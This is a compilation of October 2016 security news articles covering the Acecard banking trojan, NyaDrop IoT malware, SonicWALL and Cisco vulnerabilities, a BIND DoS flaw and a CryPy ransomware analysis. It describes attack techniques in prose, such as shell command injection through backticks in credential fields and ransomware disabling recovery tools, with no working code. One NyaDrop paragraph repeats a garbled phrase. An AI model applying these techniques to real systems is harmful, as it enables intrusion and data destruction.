The fake video plugin appears like an Adobe Flash Player, a pornographic app, or video codec.

When it is running in the background, the Acecard banking Trojan monitors the opening of specific apps usually associated with payment transactions. When the victim will open one of these apps the malware will present him a main phishing overlay, pretending to be Google Play and asking for a credit card number, that requests the submission of the card details and more personal and financial data (i.e. Cardholder name, date of birth, phone number, credit card expiration date, and CCV)

After collecting credit card and personal information from the victim, the Acecard banking Trojan the malware asks victims to complete a fake “identity confirmation” composed of three steps. In the first two steps the app requests the victim to upload a clean and readable photo of the front and back side of his identity document (national ID, passport, driver’s license):

Acecard banking trojan selfies

In the final step, the malicious app asks victims to take a selfie while holding their ID card.
Acecard banking trojan selfies 2

“After collecting credit card and personal information from the victim, the malware offers a fake “identity confirmation” that consists of three steps. The first two steps ask the user to upload a clean and readable photo of the front and back side of the victim’s identity document (national ID, passport, driver’s license).” continues the post. “The final step asks for a selfie with the identity document.”

The information collected by the Acecard banking Trojan allows attackers to perform several illegal activities that would result in the victim’s identity theft.

According to the experts, this variant of the Acecard banking Trojan has impacted users in Singapore and Hong Kong.
As usual, let me suggest avoid download from untrusted app stores and carefully review the permissions apps are asking for … and of course don’t take selfies while holding your ID card.

Android Banking Trojan Tricks Victims into Submitting Selfie Holding their ID Card
15.10.2016 thehackernews Android
Advanced Android Banking Trojan Tricks Victims to Submit a Selfie Holding Their ID Card
While some payment card companies like Mastercard have switched to selfies as an alternative to passwords when verifying IDs for online payments, hackers have already started taking advantage of this new security verification methods.
Researchers have discovered a new Android banking Trojan that masquerades primarily as a video plugin, like Adobe Flash Player, pornographic app, or video codec, and asks victims to send a selfie holding their ID card, according to a blog post published by McAfee.
The Trojan is the most recent version of Acecard that has been labeled as one of the most dangerous Android banking Trojans known today, according to Kaspersky Lab Anti-malware Research Team.
Once successfully installed, the trojan asks users for a number of device's permissions to execute the malicious code and then waits for victims to open apps, specifically those where it would make sense to request payment card information.
Acecard Steals your Payment Card and Real ID details
The banking trojan then overlays itself on top of the legitimate app where it proceeds to ask users for their payment card number and card details such as card holder's name, expiration date, and CVV number.
"It displays its own window over the legitimate app, asking for your credit card details," explains McAfee researcher Bruce Snell. "After validating the card number, it goes on to ask for additional information such as the 4-digit number on the back."
Once this is done, the trojan then looks to obtain users' personal information, including their name, date of birth, mailing address, for "verification purposes," and even requests a photo of the front and back sides of their ID card.
After this, the Trojan also prompts to ask users to hold their ID card in their hand, underneath their face, and take a selfie.
Hackers can make illegal Transfers and Take Over your Online Accounts
All these pieces of information are more than enough for an attacker to verify illegal banking transactions and steal access to victims' social media accounts by confirming the stolen identities.
So far this version of Acecard Android banking Trojan has impacted users in Singapore and Hong Kong.
This social engineering trick of Trojan obviously is not new, and any tech-savvy users would quickly catch this malicious behavior as there is no reason for Google to ask for your ID card. But the trick still works with non and less technical users.
Since all of these fake apps have been distributed outside of Google Play Store, users are strongly advised to avoid downloading and installing apps from untrusted sources. Besides this, users should pay attention to the permissions apps are asking for.
Most importantly: No app needs a photo of you holding your ID card except perhaps a mobile banking service. So, always be cautious before doing that.

Exclusive – ELF Linux/NyaDrop, a new IoT threat in the wild
15.10.2016 securityaffairs Virus

Exclusive: interview made by @unixfreaxjp of MalwareMustDie for Security Affairs about the Linux/NyaDrop. The latest details about this new dangerous IoT malware.
After the Krebs DDoS attacks the enrollment of new IoT botnets is going to grow and new large “zombie army” made by of web-ip-cam, DVR/NVR, routers/modems are invading the cyberspace.

The evidence of this comes from the finding of a new undetected malware codenamed NyaDrop by the same security researcher has discovered and reverse engineered the now famous codenamed NyaDrop by the same security researcher has discovered and reverse engineered the now famous codenamed NyaDrop by the same security researcher has discovered and reverse engineered the now famous codenamed NyaDrop by the same security researcher has discovered and reverse engineered the now famous Mirai, MalwareMustDie!

As MalwareMustDie reports in his research published yesterday on his blog, the new undetected malware NyaDrop, like the most IoT malware emerging today, relies on a kind of infection, which make use of an initial brute-force attack through which it tries to exploits the default credentials of the device. We have to remember that often the web-ip-cam, DVR/NVR, routers/modems are deployed without changing the default credentials.

Once the NyaDrop succeeded to connect – using Telnet protocol – to the IoT device infect the system dropping (downloading) in the guest host the real NyaDrop binary code: that’s why the size of NyaDrop initially is a small executable file.

Figure 1: strings contained in the binary code of NyaDrop

From the NyaDrop binary is not possible to extract too many strings except “nyABa” and from this the codename “Nya”. This string anyway is “a good way to grep for the easy filtration or one of the conditions in filtering this malware version for the mitigation purpose / signature.”

But let’s give a look to the binary code of the malware.

“If you see the size, we are dealing with a small executable file. It’s a clean libc compiled ELF from coded in C in such form that we see much in shellcodes. Insides are filled with the MIPS opcodes. We dealt before with the similar small ELF malware before in the following posts in here [link] and here [link], I will try to deal with this one too :)”

Figure 2 The NyaDrop ELF
Figure 2: The NyaDrop ELF

Small size yes? But it is amazing to see what this small malicious ELF can do..

In the MalwareMustDie analysis, the experts confirms that NyaDrop then will try to connect from the infected device to the C&C host in order to download the Nya trojan if the IoT device uses “MIPS CPU architecture, implying routers and similar networking devices, with 32bit clock. “

MIPS-based CPUs are often found within devices such as routers, DVRs, CCTV cameras, and other embedded systems, as we mentioned above.

So we have here a very selective environment malware and this means that the NyaDrop author didn’t want to attack any IoT platform, but on the contrary, he wanted to avoid infecting “useless”device: to target the best devices with the most powerful bandwidth, and avoiding to “drop” on incompatible system the precious binary code that could be unable to be executed.

The interview of @unixfreaxjp from MalwareMustDie in exclusive for Security Affair about Linux/NyaDrop

But let’s go to the interview with MalwareMustDie.

Q: What makes the sighting of NyaDrop is so low, even maybe some seen the attacks/efforts to infect?

A: We can summarize those key points:

The actor really checks the target, he aims only desirable type of hardware and is not bother to infect upon environment that not match.
He makes sure to delete the “nya” upon an effort to inject need NyaDrop, so it is also not impossible after a new “nya” installed it will delete the NyaDrop too. That way no one knows or having a sample.
Many people ask for more samples, it is very hard to get the real worked one without getting cut in the middle of infection, lucky that I know many tricks in shells.
Q: Why do you think he is asking MIPS architecture in your case? How the herder made effort for the infection in that architecture?

A: I am not sure why, but obviously, next to ARM, MIPS devices are plenty on the internet, especially the networking boxes such as gateways, routers, switch, modems etc. He made hard effort, to make the binary as small as possible with a limited set of buffer size, you can see it in the reversing part I made. The total binary size is 621 bytes, with the complete functionalities using syscalls (socket, connect, recv, open, write, close), NyaDrop was designed as backdoor to be pwn tools of routers.

Q: How do you think the effectively in using Telnet to inject/install Nyandrop to the targeted machine?

A: It’s only if you know Telnet flaw of the device or hardcoded pwd then one are aiming this sector. In this season, we have about 2million device with Telnet running on the internet, the effectivity to aim this protocol to gain shell privilege is fairly high. The way the coder inject the binary using echo commands it’s not smart and can raise a risk to break some shell on handling those data, this is also why the successfully injected binary spotted is low.

Sorry, but I am not going to suggest the best way for do this.

Q: You mentioned it was originated in Russia, why?

A: Seeing the way it is coded & compiled, it is good, it trimmed the ELF into the minimum running state… it is very hard to imagine that skiddies that we know is having such knowledge.

I investigated deeper the source IP used, such connection will not be easily contracted by westerners.

Q: Do you think it is a new concept to infect IoT using the dropper/injector backdoor like Linux/NyaDrop?

A: For the malware, the concept is not new, for IoT it is new since IoT was never being aimed as hard as now also. But I see many types of socket connect()/back_connect() ELF dropped in server side plenty of time, during the Shellshock era we had tons of these, the concept is not new at all.

In fact, I know exactly what, where, and how to look when this type is starting to hit IoT.

About the Author: Odisseus

Independent Security Researcher involved in Italy and worldwide in topics related to hacking, penetration testing and development.

Security experts released an anti-reconnaissance tool dubbed NetCease

15.10.2016 securityaffairs Security

A Microsoft security duo released a new tool dubbed NetCease designed to make hard for attackers to conduct reconnaissance.
Microsoft experts have released a tool dubbed NetCease that was designed to make hard reconnaissance activities of hackers.

The NetCease tool was developed by two researchers of the Microsoft Advanced Threat Analytics (ATA) research team, Itai Grady and Tal Be’ery.

The security experts will present the tool at the Black Hat Europe where they will explore the concept of “offensive cyber defense” methods.

The application is not classified as an official Microsoft tool, but it has been made available on Microsoft’s TechNet Gallery under the default license terms for “Software on Documentation Portals.”

The reconnaissance is a critical phase of an attack, attackers gather information of the potential targets identified target machines, potential bridge components for lateral movements and privileged users.

Once the attacker has identified the targets, he can use the NetSessionEnum function to retrieve information about sessions established on domain controllers (DC) or other servers in the network.

A NetSessionEnum could allow attackers to discover device name, IP address, the username that established a session, and the duration of each session.

This data are essential for attackers to move laterally within their victim’s network.

Any domain user has the permission by default to execute the NetSessionEnum method remotely. Anyway, it is possible to harden the access to the NetSessionEnum method by manually editing a registry key. The NetCease is a PowerShell script that modifies this registry key modify to forbid the execution of the NetSessionEnum.

“Net Cease” tool is a short PowerShell (PS) script which alters Net Session Enumeration (NetSessionEnum) default permissions. This hardening process prevents attackers from easily getting some valuable recon information to move laterally within their victim’s network.” reads the NetCease description.

“The NetCease script hardens the access to the NetSessionEnum method by removing the execute permission for Authenticated Users group and adding permissions for interactive, service and batch logon sessions,” the experts explained. “This will allow any administrator, system operator and power user to remotely call this method, and any interactive/service/batch logon session to call it locally.”


NetCease is simple to use, administrators have to run the PowerShell script as administrator on the machine they need to harden (i.e. a Domain Controller), then restart it.

33 million records exposed after the Evony data breach
14.10.2016 securityaffairs Crime

The website and the forum of the Evony gaming company were hacked this summer and as a result 33 Million of its gamers have their data compromised.
Data of more than 33 million accounts of the Evony gaming company were stolen as result of a data breach occurred in June. Evony is the company that developed the popular game Evony: Age II, that is played by more of 18 Million gamers in over 167 countries. Hackers breached the website of Evony gaming firm accessing 33,407,472 records of registered user accounts.

Two months later, on August, the website was breached again, at that time hackers compromised the Evony forum exposing data of 938,000 registered accounts.

The data breach notification service LeakedSource obtained a copy of the huge archive and published a detailed analysis of the leaked data.

“Gaming company Evony was hacked for a total of 33,407,472 users from its main game database in June of 2016. Earlier this year in August we discovered their forums were also hacked for 938k users.” states a blog post published by the company.

“Each record contains a username, email address, password, and ip address among other internal data fields. Users can now get notified any time they appear in a breach. If your personal information appears in our copy of this database, or in any other leaked database that we possess, you may remove yourself for free.”

Each record includes username, email address, password, and IP address and other internal data. The password were stored in unsalted MD5 and SHA-1 (Secure Hash Algorithm 1), this means that for hackers it is quite easy to decrypt them.

“Passwords were stored using unsalted MD5 hashing which means at this point we have cracked most of them. Surprisingly they also stored the passwords in unsalted SHA1 next to the MD5 which makes no sense but anyway” continues the post.


123456 was the most used password on the gaming site, this is the demonstration that users are a low perception of cyber threats and lack of awareness on a proper security posture online.

A look to the top email domains reveal that @Yahoo.com was one of the most popular, followed by @hotmail.com.


At the time I was writing it is not clear is the Evony company has alerted its registered users.

12-Year-Old SSH Bug Exposes More than 2 Million IoT Devices
14.10.2016 thehackernews Vulnerebility
Are your internet-connected devices spying on you? Perhaps.
We already know that the Internet of Thing (IoT) devices are so badly insecure that hackers are adding them to their botnet network for launching Distributed Denial of Service (DDoS) attacks against target services.
But, these connected devices are not just limited to conduct DDoS attacks; they have far more potential to harm you.
New research [PDF] published by the content delivery network provider Akamai Technologies shows how unknown threat actors are using a 12-year-old vulnerability in OpenSSH to secretly gain control of millions of connected devices.
The hackers then turn, what researchers call, these "Internet of Unpatchable Things" into proxies for malicious traffic to attack internet-based targets and 'internet-facing' services, along with the internal networks that host them.
Unlike recent attacks via Mirai botnet, the new targeted attack, dubbed SSHowDowN Proxy, specifically makes use of IoT devices such as:
Internet-connected Network Attached Storage (NAS) devices.
CCTV, NVR, DVR devices (video surveillance).
Satellite antenna equipment.
Networking devices like routers, hotspots, WiMax, cable and ADSL modems.
Other devices could be susceptible as well.
More importantly, the SSHowDowN Proxy attack exploits over a decade old default configuration flaw (CVE-2004-1653) in OpenSSH that was initially discovered in 2004 and patched in early 2005. The flaw enables TCP forwarding and port bounces when a proxy is in use.
However, after analyzing IP addresses from its Cloud Security Intelligence platform, Akamai estimates that over 2 Million IoT and networking devices have been compromised by SSHowDowN type attacks.
Due to lax credential security, hackers can compromise IoT devices and then use them to mount attacks "against a multitude of Internet targets and Internet-facing services, like HTTP, SMTP and network scanning," and to mount attacks against internal networks that host these connected devices.
Once hackers access the web administration console of vulnerable devices, it is possible for them to compromise the device's data and, in some cases, fully take over the affected machine.
While the flaw itself is not so critical, the company says the continual failure of vendors to secure IoT devices as well as implementing default and hard-coded credentials has made the door wide open for hackers to exploit them.
"We are entering a very interesting time when it comes to DDoS and other web attacks; 'The Internet of Unpatchable Things' so to speak," said Eric Kobrin, senior director of Akamai's Threat Research team.
"New devices are being shipped from the factory not only with this vulnerability exposed but also without any effective way to fix it. We've been hearing for years that it was theoretically possible for IoT devices to attack. That, unfortunately, has now become the reality."
According to the company, at least 11 of Akamai's customers in industries such as financial services, retail, hospitality, and gaming have been targets of SSHowDowN Proxy attack.
The company is "currently working with the most prevalent device vendors on a proposed plan of mitigation."
How to Mitigate Such Attacks?
So, if you own a connected coffee machine, thermostat or any IoT device, you can protect yourself by changing the factory default credentials of your device as soon as you activate it, as well as disabling SSH services on the device if it is not required.
More technical users can establish inbound firewall rules that prevent SSH access to and from external forces.
Meanwhile, vendors of internet-connected devices are recommended to:
Avoid shipping such products with undocumented accounts.
Force their customers to change the factory default credentials after device installation.
Restrict TCP forwarding.
Allow users to update the SSH configuration to mitigate such flaws.
Since IoT devices number has now reached in the tens of billions, it’s time to protect these devices before hackers cause a disastrous situation.
Non-profit organizations like MITRE has come forward to help protect IoT devices by challenging researchers to come up with new, non-traditional approaches for detecting rogue IoT devices on a network. The company is also offering up to $50,000 prize money.

Here’s how Tor Project and Mozilla will make harder de-anonymizing Tor users

14.10.2016 securityaffairs Security

Tor Project and Mozilla are working together to improve the security of Tor users and make harder for attackers to unmask them.
Intelligence and law enforcement agencies continue to invest in order to de-anonymize Tor users. In the past, we received news about several techniques devised by various agencies to track Tor users, from the correlation attacks to the hack of a machine with the NIT script.

In many cases, authorities and cyber spies targeted individual users’ computers for this reason the experts the Tor Project alongside with the experts from Mozilla’s Firefox involved in the project are working on a series of improvements to make harder the exploitation of flaws in the browser component of the Tor architecture.

The improvements aim to block malware from trying to gather information to unmask users.

Tor Project

“We’re at the stage right now where we have created the basic tools and we’re working on putting them together to realize the security benefits,” Richard Barnes, Firefox Security Lead, told Joseph Cox from Motherboard via email.

The Tor Browser is composed of two components, a modified version of the Firefox browser, and the Tor proxy which implements routing functionalities in the Tor network. An attacker can try to hack the browser component forcing it to connect to other than the legitimate Tor proxy part, for example, a server set up by the attacker that gathers user data.

“That means if an attacker can compromise the Firefox half of Tor Browser, it can de-anonymize the user by connecting to something other than the Tor proxy,” Barnes said.

Barnes a series of improvements, including the use of Unix domain sockets that are data communications endpoints for exchanging data between processes executing on the same operating system.

This will allow the Tor Browser to securely communicate with the FireFox component without underlying the network protocol. In this was the experts will sandbox the Firefox component, any manipulation or attacks will have no effects on the user’s privacy because the Tor Browser wouldn’t be able to make a network connection to de-anonymize the user.

Basically the intent of the experts at the Tor Project is to sandbox the Tor browser to insulate our users from attacks such as the NIT and similar ones. According to Motherboard, the Tor developer Yawning Angel just finished an experimental prototype that will likely appear in some versions of the Tor Browser later this year.

“That means that you could run it in a sandbox with no network access (only a Unix domain socket to the proxy), and it would still work fine. And then, even if the Firefox half of Tor Browser were compromised, it wouldn’t be able to make a network connection to de-anonymize the user,” added Barnes.

As explained by Barnes such kind of security measures is actually supported only on platforms that have implement Unix domain sockets, such as Linux and Mac OS.

The experts are now working to extend it to Windows platforms.

SonicWALL Email Security appliance flaws could expose corporate emails
14.10.2016 securityaffairs Vulnerebility

Dell issued the SonicWALL Email Security OS 8.3.2 release to address high severity issues that can be exploited to take control of the appliance.
Security researchers at Digital Defense discovered multiple vulnerabilities while assessed the SonicWALL Email Security virtual appliance (Version According to the experts. The flaws could be exploited by attackers to conduct a wide range of malicious activities, including command injection, arbitrary file deletion, denial-of-service (DoS) and information disclosure.

Below the list of vulnerabilities discovered by the experts at the Digital Defense, Inc. Vulnerability Research Team (VRT).

DDI-VRT-2016-69: Authentication Bypass in DLoadReportsServlet (High)

The attacker can access backup files that include also the SHA-1 hash of the administrator account password.

“The DLoadReportsServlet can be accessed via the http://<IP>/dload_reports URL without authentication. If any backups have been made via the web interface and the Email Security appliance is set as the storage location, they can be downloaded by supplying the path to the backup via the “snapshot” GET parameter which can be used to access any files stored in the backup directory or one of its sub-directories. ” reads the analysis published by the experts.

DDI-VRT-2016-70: Authenticated XML External Entity Injection in known_network_data_import.html (High)

The experts discovered that it is possible to launch an XML External Entity (XXE) injection attack to steal sensitive data.

DDI-VRT-2016-71: Authenticated Remote Command Execution in manage_ftpprofile.html (High)

This issue could be exploited by an attacker to send backup files to a remote FTP server.

“The SonicWALL Email Security appliance has an option to send backup files to a remote FTP server instead of storing them locally on the appliance. To use this functionality, the user would need to create an FTP profile which includes the FTP server address, port, username, password, and destination path. No sanitation is done on the user provided values for the username or password before they are saved for later use. Commands placed inside backticks or semicolons can be injected via the username or password parameters.” states the analysis published by Digital Defense.

DDI-VRT-2016-72: Authenticated Arbitrary File Deletion in policy_dictionary.html (High)

The flaw allows attackers to delete arbitrary files with root privileges and trigger DoS conditions.
The researchers discovered that a bug in the way compliance dictionaries are managed via web interface allows authenticated attackers to select any files and delete them.

“When a dictionary is selected for deletion the “save” method is called. This method first verifies that the dictionary selected for deletion is not in use before deleting the dictionary file from disk. The “save” method does not validate that the “selectedDictionary” POST parameter contains a valid dictionary before deleting the file. This allows an authenticated user to delete any files from the host that is running the SonicWALL Email Security software.” states the advisory.


The researchers explained that flawed SonicWALL Email Security virtual appliance could be always configured for external access, this means that remote attackers can take complete control of it by combining the authentication bypass and command execution flaws.

The full control over the SonicWALL Email Security virtual appliance could be exploited to capture inbound and outbound emails of the organization.

Dell has patched the issued with the new SonicWALL Email Security OS 8.3.2 release.

Cisco Meeting Server – CVE-2016-6445 flaw allows to impersonate legitimate users
14.10.2016 securityaffairs Vulnerebility

Cisco fixed a critical vulnerability in the Cisco Meeting Server, tracked as CVE-2016-6445, that allows remote attackers to impersonate legitimate users.
A security vulnerability in Cisco Meeting Server, tracked as CVE-2016-6445, could be exploited by attackers to impersonate legitimate users.
Experts from Cisco uncovered the vulnerability during a routine security audit of a customer.

The hole resides in the Extensible Messaging and Presence Protocol (XMPP) service of the Cisco Meeting Server (CMS). According to Cisco, the XMPP service incorrectly processes a deprecated authentication scheme allowing an unauthenticated attacker to access the system impersonating another user.

“A vulnerability in the Extensible Messaging and Presence Protocol (XMPP) service of the Cisco Meeting Server (CMS) could allow an unauthenticated, remote attacker to masquerade as a legitimate user.” reads the security advisory published by CISCO. “This vulnerability is due to the XMPP service incorrectly processing a deprecated authentication scheme. A successful exploit could allow an attacker to access the system as another user.”

CVE-2016-6445 flaw cisco-meeting-server

The CVE-2016-6445 flaw affects the following versions of the Cisco Meeting Server:

Cisco Meeting Server prior to 2.0.6 with XMPP enabled. Acano Server prior to 1.8.18 and prior to 1.9.6 with XMPP enabled.
Acano Server prior to 1.8.18 and prior to 1.9.6 with XMPP enabled.
CISCO urges its customers to apply appropriate updates, it also suggests as a workaround to disable the XMPP protocol using the “xmpp disable” command.

According to the company, there is no evidence that the CVE-2016-6445 has been exploited in the wild.

This is the second advisory published by Cisco for Meeting Server, a first one was published in July and it was related to a persistent cross-site scripting (XSS) flaw that allowed an unauthenticated attacker to execute arbitrary code in the context of the product’s management interface.

“A vulnerability in the web bridge that offers video via a web interface of Cisco Meeting Server Software, formerly Acano Conferencing Server, could allow an unauthenticated, remote attacker to conduct a persistent cross-site scripting (XSS) attack against a user of the web interface of an affected system.” stated the Cisco Advisory.
“The vulnerability is due to improper input validation of certain parameters that are passed to an affected device via an HTTP request. An attacker could exploit this vulnerability by persuading a user to follow a malicious link.”

Back to the CVE-2016-6445 flaw, the firmware updates can be downloaded from the CISCO Software Center (Products > Conferencing > Video Conferencing > Multiparty Conferencing > Meeting Server > Meeting Server 1000 > TelePresence Software).

Acano software can be downloaded from the Acano website.

Attackers are exploiting a recently patched high-severity DoS flaw in BIND
13.10.2016 securityaffairs Attack

Attackers are exploiting a recently patched high-severity DoS flaw, tracked as CVE-2016-2776, in the in the popular DNS software in BIND.
Last month a vulnerability in the popular DNS software BIND, tracked as CVE-2016-2776, has been patched. The flaw could be exploited by a remote attacker to trigger a DoS condition using specially crafted DNS packets. The high severity flaw initially discovered by the Internet Systems Consortium (ISC) was fixed with the release of BIND 9.9.9-P3, 9.10.4-P3 and 9.11.0rc3.

“Testing by ISC has uncovered a critical error condition which can occur when a nameserver is constructing a response. A defect in the rendering of messages into packets can cause named to exit with an assertion failure in buffer.c while constructing a response to a query that meets certain criteria.” reported the alert issued by the ISC.

“This assertion can be triggered even if the apparent source address isn’t allowed to make queries (i.e. doesn’t match ‘allow-query’).”

The flaw resides in the way DNS server constructs a response to certain queries, when the response has a size larger than the default 512 it trigger the DoS condition due to the crash of the BIND name server process.

According to the Internet Systems Consortium (ISC), after the public disclosure of the proof-of-concept (PoC) code and a Metasploit module by the Infobyte firm, threat actors in the wild exploited it to cause server crashes.


The news was confirmed by the Japan’s National Police Agency that issued a security alert titled “BIND Vulnerability (CVE-2016-2776) for the observation of indiscriminate attack activities” to warn users of ongoing attacks.

“Designated as CVE-2016-2776, this particular vulnerability can be triggered when a DNS server constructs a response to a crafted query where the response size crosses the default DNS response size 512. ISC has fixed two vulnerable functions dns_message_renderbegin () and dns_message_rendersection() to address this vulnerability.” states the analysis published by TrendMicro.

“Before patching, the server does not take fixed 12-byte DNS headers into consideration, which also adds to the response traffic after rendering the Resource Records from Query through function dns_message_rendersection(). So if the DNS response(r.length) traffic is less than 512 bytes (msg->reserved), the function will return true, but adding the fixed 12-byte header will cause the service to terminate if it exceeds the fixed reserved size of 512 bytes.”

Experts at Infobyte believe that the use of the msg->reserved variable could introduce other vulnerabilities like the CVE-2016-2776.

“Publishing a fix about a lethal bug where you would have to patch the whole internet, doesn’t leave a lot of time to find elegant solutions. So if you review the fix it’s possible that a new similar bug appears in dns_message_renderbegin(). while the use of msg->reserved is quite limited. It continues being a complex software. Meanwhile msg->reserved is still being used, the existence of a bug like CVE-2016-2776 is quite probable.” states the blog post from InfoByte.

Classified U.S. Defense Network Outage Hits Air Force’s Secret Drone Operations
13.10.2016 thehackernews Safety
U.S. drones are again in news for killing innocent people.
The Air Force is investigating the connection between the failure of its classified network, dubbed SIPRNet, at Creech Air Force Base and a series of high-profile airstrikes that went terribly wrong in September this year.
Creech Air Force Base is a secret facility outside Las Vegas, where military and Air Force pilots sitting in dark and air-conditioned rooms, 7100 miles from Syria and Afghanistan, remotely control their "targeted killing" drone campaign in a video-game-style warfare.
From this ground zero, Air Force pilots fire missiles just by triggering a joystick on a targeted areas half a world away, as well as operate drones for surveillance and intelligence gathering.
Drone operation facility at Creech Air Force Base -- a key base for worldwide drone and targeted killing operations -- has been assigned as ‘Special Access Programs’, to access SIPRnet.
What is SIPRnet?
SIPRNet, or Secret Internet Protocol Router Network, is a global United States military Internet system used for transmitting classified information, intelligence, targets, and messages at the secret level.
In other words, SIPRNet is completely parallel Internet, uses the same communications procedures and has been kept separate from the ordinary civilian Internet.
Approximately 3 Million people with secret clearances have access to SIPRNet, which includes Pentagon and military officials, Intelligence agencies, FBI, as well as diplomats in US embassies all around the World.
Classified Network Crashed at Creech Base
The network at Creech Air Force Base was crashed in early September that impacted "critical services," and has not been completely rebuilt, according to US government contracting records.
"On 9 September 2016, the SIPRNet system currently in operation at Creech AFB failed, and critical services were impacted," reads a contracting notice posted by the US government in early October.
"The services were somewhat restored with the use of multiple less powerful devices. This temporary solution stabilized the services, but will not be able to maintain the demand for very long. If this solution fails, there is currently no other backup system."
The officials would not say whether the failure was due to internal technical faults, a cyber attack, or a state-sponsored hacker. They would also not say if JWICS — a separate internet system that handles top-secret information — at Creech was also affected.
US Drones Killed around 100 Innocents within Two Weeks
Within weeks of the computer disaster, a series of airstrikes went terribly wrong, which resulted in scores of deaths in Syria, Afghanistan, and Somalia, according to BuzzFeed News.
On September 17, 62 Syrian soldiers were accidentally killed by US airstrikes in the middle of a ceasefire. On September 28, 15 innocent civilians were reportedly killed in Afghanistan by a US drone, as well as 22 Somali soldiers were reportedly killed in Somalia by US drone strikes.
All the cases are under review and investigation, and there has been no official explanation for targeting innocent people, though the United States expressed its regrets quickly after the incident, according to reports.
On October 7, the Air Force quietly announced that Creech base would be subject to a surprise cyber security inspection and warned personnel to be wary of phishing attacks and to be extra careful in securing their login credentials.
Has U.S. Classified Network Been Hacked?
These classified networks are definitely not connected to the Internet, but this does not mean that malware or well-resourced hackers can never found their ways into these critical networks.
If confirmed, this would not be the first time, when a classified computer network of US military has been compromised.
In the year 2008, The Pentagon acknowledged a significant cyber attack, Operation Buckshot Yankee, where a foreign intelligence agent used a USB drive to infect military computers used by the Central Command in overseeing combat zones in Iraq and Afghanistan with a specially crafted malware.
You might be aware of Chelsea Manning (then known as Bradley Manning), an army soldier who made headlines in 2013 when she was sentenced to 35 years in prison for leaking over 700,000 classified files to WikiLeaks.
Manning allegedly downloaded those secret documents from SIPRNet using a Lady Gaga CD.
Since these classified networks have a significant role in US national security, terrorist groups and state-sponsored hackers belonging to sophisticated nation-states like China, Russia, Iran, and North Korea have always shown large interest in targeting them.

CryPy: ransomware behind Israeli lines
13.10.2016 Kaspersky Virus
A Tweet posted recently by AVG researcher, Jakub Kroustek, suggested that a new ransomware, written entirely in Python, had been found in the wild, joining the emerging trend for Pysomwares such as the latest HolyCrypt, Fs0ciety Locker and others.

This Python executable comprises two main files. One is called boot_common.py and the other encryptor.py. The first is responsible for error-logging on Windows platforms, while the second, the encryptor, is the actual locker. Within the encryptor are a number of functions including two calls to the C&C server. The C&C is hidden behind a compromised web server located in Israel. The Israeli server was compromised using a known vulnerability in a content management system called Magento, which allowed the threat actors to upload a PHP shell script as well as additional files that assist them in streaming data from the ransomware to the C&C and back.

A notable point to mention is that the server was also used for phishing attacks, and contained Paypal phishing pages. There are strong indications that a Hebrew-speaking threat actor was behind these phishing attacks. The stolen Paypal credentials were forwarded to another remote server located in Mexico and which contains the same arbitrary file upload technique, only with a different content management.

It is a known practice for attackers to look for low-hanging fruit into which they can inject their code in order to hide their C&C server. One such example was the CTB-Locker for web servers reported last March.

Ransomware Analysis
SHA1: ad046bfa111a493619ca404909ef82cb0107f012
MD5: 8bd7cd1eee4594ad4886ac3f1a05273b
Size: 5.22 MB
Type: exe

To reverse the executable one should first conduct a number of checks using a convenient debugger. The universal steps for unpacking an unknown packer start with trying to set a memory breakpoint on popular functions that packers use, such as VirtualAlloc.

If the breakpoint hits, the next step involves switching to user mode and setting a hardware breakpoint (on access). That will assist in inspecting where exactly the program initializes the memory block. In most cases, an executable magic header (MZ) should appear in the memory block. However, in this case the following screenshot shows the readable data that was allocated to that memory block:


After the data was allocated to the memory block, it appeared to be using VM code (python vm) to execute the code. For those who are not familiar with the term, VM code is the process of creating new instruction sets based on the author’s request. The CPU uses those instruction sets to understand the instructions.

py2exe simply converts the code to x86 assembly, the architecture used on the CPU for communication, and, by loading a python DLLs, loads all the modules into the memory.

We found that the executable file was generated using py2exe. The first indicator was a stack PUSH instruction to add the string – PY2EXE_VERBOSE: a module that compiles Python scripts to Microsoft Windows executables.


PY2EXE module string disclosure

A module that reverse the operation of the py2exe can be found in Github and is called unpy2exe. This module will revert the executable back to its origin Python compiled code (i.e. .pyc file). From that format, another step will be required to fully revert to the original code. We randomly chose to use EasyPythonDecompiler.


Fully decompiled Python scripts

In it’s current state, the executable fails to encrypt the file system, simply because the threat actors must have migrated from the current server to another. By doing so, they deleted the remaining traces of the PHP files they used for data collection from a victim’s machine. The following is the log file that is generated upon exception:


Error log file being generated by the boot_common.py

The scripts in Python use two files:

Name: boot_common.py
md5: dfd6237e26babdbc2b32fa0d625c2d16
SHA1: 38fe7b64113e467375202e2708199b45a22b25a6
Size: 3Kb
This file throws an “error” to show that the program failed to execute if there is a problem.
Name: encryptor.py
md5: 1ed3f127a0e94394ef049965bbc952ef
SHA1: 73122712b4563fadcc9871eb3fe0efdcf70bb608
Size: 9Kb
This script encrypts the victim’s files.
The ransomware disables the following features from the compromised machine:
By overwriting the registry policies it disables Registry Tools, Task Manager, CMD and Run.


list of registry manipulations

It then continues with changing bcdedit to disable recovery and ignore boot status policy.

Upon successful encryption, the ransomware will encrypt the following file extensions:
*.mid, *.wma, *.flv, *.mkv, *.mov, *.avi, *.asf, *.mpeg, *.vob, *.mpg, *.wmv, *.fla, *.swf, *.wav, *.qcow2, *.vdi, *.vmdk, *.vmx, *.gpg, *.aes, *.ARC, *.PAQ, *.tar.bz2, *.tbk, *.bak, *.tar, *.tgz, *.rar, *.zip, *.djv, *.djvu, *.svg, *.bmp, *.png, *.gif, *.raw, *.cgm, *.jpeg, *.jpg, *.tif, *.tiff, *.NEF, *.psd, *.cmd, *.class, *.jar, *.java, *.asp, *.brd, *.sch, *.dch, *.dip, *.vbs, *.asm, *.pas, *.cpp, *.php, *.ldf, *.mdf, *.ibd, *.MYI, *.MYD, *.frm, *.odb, *.dbf, *.mdb, *.sql, *.SQLITEDB, *.SQLITE3, *.asc, *.lay6, *.lay, *.ms11 (Security copy), *.sldm, *.sldx, *.ppsm, *.ppsx, *.ppam, *.docb, *.mml, *.sxm, *.otg, *.odg, *.uop, *.potx, *.potm, *.pptx, *.pptm, *.std, *.sxd, *.pot, *.pps, *.sti, *.sxi, *.otp, *.odp, *.wks, *.xltx, *.xltm, *.xlsx, *.xlsm, *.xlsb, *.slk, *.xlw, *.xlt, *.xlm, *.xlc, *.dif, *.stc, *.sxc, *.ots, *.ods, *.hwp, *.dotm, *.dotx, *.docm, *.docx, *.DOT, *.max, *.xml, *.txt, *.CSV, *.uot, *.RTF, *.pdf, *.XLS, *.PPT, *.stw, *.sxw, *.ott, *.odt, *.DOC, *.pem, *.csr, *.crt, *.key and wallet.dat to encrypt crypto currency wallets

The files are encrypted using AES with CBC mode for the following paths:

[userhome]\\My Documents\\
